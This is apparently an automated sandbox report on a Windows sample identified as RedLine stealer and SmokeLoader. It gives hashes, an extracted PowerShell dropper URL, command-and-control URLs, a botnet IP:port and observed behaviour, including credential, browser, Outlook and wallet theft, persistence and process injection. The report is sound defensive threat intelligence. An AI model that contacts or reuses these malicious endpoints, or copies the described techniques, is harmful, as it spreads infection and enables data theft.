redline | d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38

Analysis

max time kernel
152s
max time network
142s
platform
windows10_x64
resource
win10-en-20211104
submitted
02-12-2021 16:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Size

234KB
MD5

8a9b7acd470f23cfbd45530fd1508683
SHA1

b7fc2e2d2567267b2f019d1ac034b06935158c6b
SHA256

d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38
SHA512

8e6a26c2aac183ca32d23c0cc45ea7a7c8446b2569bd9470bba1cd6c30aedfd1dc4eea8c8ea2d0895d0f7b14adada19dffdf8d3b212de93ba34566c9c0402048

Score

10^/10

redline smokeloader 1 backdoor collection discovery evasion infostealer persistence spyware stealer suricata trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

smokeloader

Version

2020

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

https://cinems.club/search.php

https://clothes.surf/search.php

rc4.i32

Extracted

Family

redline

Botnet

45.9.20.59:46287

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/876-142-0x0000000004A80000-0x0000000004AAE000-memory.dmp	family_redline
behavioral1/memory/876-145-0x0000000007620000-0x000000000764C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND
suricata
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
suricata: ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND
suricata
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
107	2252	powershell.exe
109	2252	powershell.exe
110	2252	powershell.exe
111	2252	powershell.exe
113	2252	powershell.exe
115	2252	powershell.exe
117	2252	powershell.exe
119	2252	powershell.exe
121	2252	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

3218.exeSmartClock.exe50CC.exe8328.exeCFF1.exe

pid process

2208 3218.exe
896 SmartClock.exe
1688 50CC.exe
876 8328.exe
1312 CFF1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
2208	3218.exe
896	SmartClock.exe
1688	50CC.exe
876	8328.exe
1312	CFF1.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Deletes itself 1 IoCs

Processes:

pid process

2264
Drops startup file 1 IoCs

Processes:

3218.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 3218.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

3768
3768
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2264

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk	3218.exe

pid	process
3768
3768

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

explorer.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jakwdqzk.1jj.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_aovvc3sr.1xv.ps1	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3F42.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI408D.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3FB2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI40EC.tmp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2252 3836 WerFault.exe DllHost.exe

pid	pid_target	process	target process
2252	3836	WerFault.exe	DllHost.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

50CC.exed0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	50CC.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	50CC.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	50CC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3148 tasklist.exe
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exeNETSTAT.EXENETSTAT.EXEipconfig.exe

pid process

736 ipconfig.exe
2208 NETSTAT.EXE
2764 NETSTAT.EXE
1532 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

1164 systeminfo.exe

pid	process
3148	tasklist.exe

pid	process
736	ipconfig.exe
2208	NETSTAT.EXE
2764	NETSTAT.EXE
1532	ipconfig.exe

pid	process
1164	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 14 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{70D81563-55EC-11EC-B34F-EA93EE369050} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Internet Explorer\Main
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe

Modifies registry class 2 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1064 reg.exe
Runs net.exe

pid	process
1064	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	109	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	110	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	111	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	113	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

SmartClock.exe

pid process

896 SmartClock.exe

pid	process
896	SmartClock.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe

pid	process
2368	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
2368	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264
2264

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2264
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

620
620

pid	process
2264

pid	process
620
620

Suspicious behavior: MapViewOfSection 58 IoCs

Processes:

d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe50CC.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
2368	d0952af06d5f8ca8df078913d6e36d61e3b79c9aec03416042e5414497ecfc38.exe
1688	50CC.exe
2264
2264
2264
2264
2264
2264
820	explorer.exe
820	explorer.exe
2264
2264
1944	explorer.exe
1944	explorer.exe
2264
2264
3404	explorer.exe
3404	explorer.exe
2264
2264
2120	explorer.exe
2120	explorer.exe
2264
2264
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
3616	explorer.exe
2264
2264
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe
504	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

8328.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeShutdownPrivilege	2264
Token: SeCreatePagefilePrivilege	2264
Token: SeShutdownPrivilege	2264
Token: SeCreatePagefilePrivilege	2264
Token: SeDebugPrivilege	876	8328.exe
Token: SeIncreaseQuotaPrivilege	3520	WMIC.exe
Token: SeSecurityPrivilege	3520	WMIC.exe
Token: SeTakeOwnershipPrivilege	3520	WMIC.exe
Token: SeLoadDriverPrivilege	3520	WMIC.exe
Token: SeSystemProfilePrivilege	3520	WMIC.exe
Token: SeSystemtimePrivilege	3520	WMIC.exe
Token: SeProfSingleProcessPrivilege	3520	WMIC.exe
Token: SeIncBasePriorityPrivilege	3520	WMIC.exe
Token: SeCreatePagefilePrivilege	3520	WMIC.exe
Token: SeBackupPrivilege	3520	WMIC.exe
Token: SeRestorePrivilege	3520	WMIC.exe
Token: SeShutdownPrivilege	3520	WMIC.exe
Token: SeDebugPrivilege	3520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3520	WMIC.exe
Token: SeRemoteShutdownPrivilege	3520	WMIC.exe
Token: SeUndockPrivilege	3520	WMIC.exe
Token: SeManageVolumePrivilege	3520	WMIC.exe
Token: 33	3520	WMIC.exe
Token: 34	3520	WMIC.exe
Token: 35	3520	WMIC.exe
Token: 36	3520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3520	WMIC.exe
Token: SeSecurityPrivilege	3520	WMIC.exe
Token: SeTakeOwnershipPrivilege	3520	WMIC.exe
Token: SeLoadDriverPrivilege	3520	WMIC.exe
Token: SeSystemProfilePrivilege	3520	WMIC.exe
Token: SeSystemtimePrivilege	3520	WMIC.exe
Token: SeProfSingleProcessPrivilege	3520	WMIC.exe
Token: SeIncBasePriorityPrivilege	3520	WMIC.exe
Token: SeCreatePagefilePrivilege	3520	WMIC.exe
Token: SeBackupPrivilege	3520	WMIC.exe
Token: SeRestorePrivilege	3520	WMIC.exe
Token: SeShutdownPrivilege	3520	WMIC.exe
Token: SeDebugPrivilege	3520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3520	WMIC.exe
Token: SeRemoteShutdownPrivilege	3520	WMIC.exe
Token: SeUndockPrivilege	3520	WMIC.exe
Token: SeManageVolumePrivilege	3520	WMIC.exe
Token: 33	3520	WMIC.exe
Token: 34	3520	WMIC.exe
Token: 35	3520	WMIC.exe
Token: 36	3520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	492	WMIC.exe
Token: SeSecurityPrivilege	492	WMIC.exe
Token: SeTakeOwnershipPrivilege	492	WMIC.exe
Token: SeLoadDriverPrivilege	492	WMIC.exe
Token: SeSystemProfilePrivilege	492	WMIC.exe
Token: SeSystemtimePrivilege	492	WMIC.exe
Token: SeProfSingleProcessPrivilege	492	WMIC.exe
Token: SeIncBasePriorityPrivilege	492	WMIC.exe
Token: SeCreatePagefilePrivilege	492	WMIC.exe
Token: SeBackupPrivilege	492	WMIC.exe
Token: SeRestorePrivilege	492	WMIC.exe
Token: SeShutdownPrivilege	492	WMIC.exe
Token: SeDebugPrivilege	492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	492	WMIC.exe
Token: SeRemoteShutdownPrivilege	492	WMIC.exe
Token: SeUndockPrivilege	492	WMIC.exe
Token: SeManageVolumePrivilege	492	WMIC.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

iexplore.exe

pid process

2264
2264
968 iexplore.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

pid process

2264
2264
2264
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

968 iexplore.exe
968 iexplore.exe
1588 IEXPLORE.EXE
1588 IEXPLORE.EXE

pid	process
2264
2264
968	iexplore.exe

pid	process
2264
2264
2264

pid	process
968	iexplore.exe
968	iexplore.exe
1588	IEXPLORE.EXE
1588	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3218.execmd.exeCFF1.exepowershell.execsc.execsc.exe

description	pid	process	target process
PID 2264 wrote to memory of 2208	2264		3218.exe
PID 2264 wrote to memory of 2208	2264		3218.exe
PID 2264 wrote to memory of 2208	2264		3218.exe
PID 2208 wrote to memory of 896	2208	3218.exe	SmartClock.exe
PID 2208 wrote to memory of 896	2208	3218.exe	SmartClock.exe
PID 2208 wrote to memory of 896	2208	3218.exe	SmartClock.exe
PID 2264 wrote to memory of 1688	2264		50CC.exe
PID 2264 wrote to memory of 1688	2264		50CC.exe
PID 2264 wrote to memory of 1688	2264		50CC.exe
PID 2264 wrote to memory of 876	2264		8328.exe
PID 2264 wrote to memory of 876	2264		8328.exe
PID 2264 wrote to memory of 876	2264		8328.exe
PID 2264 wrote to memory of 2776	2264		cmd.exe
PID 2264 wrote to memory of 2776	2264		cmd.exe
PID 2776 wrote to memory of 3520	2776	cmd.exe	WMIC.exe
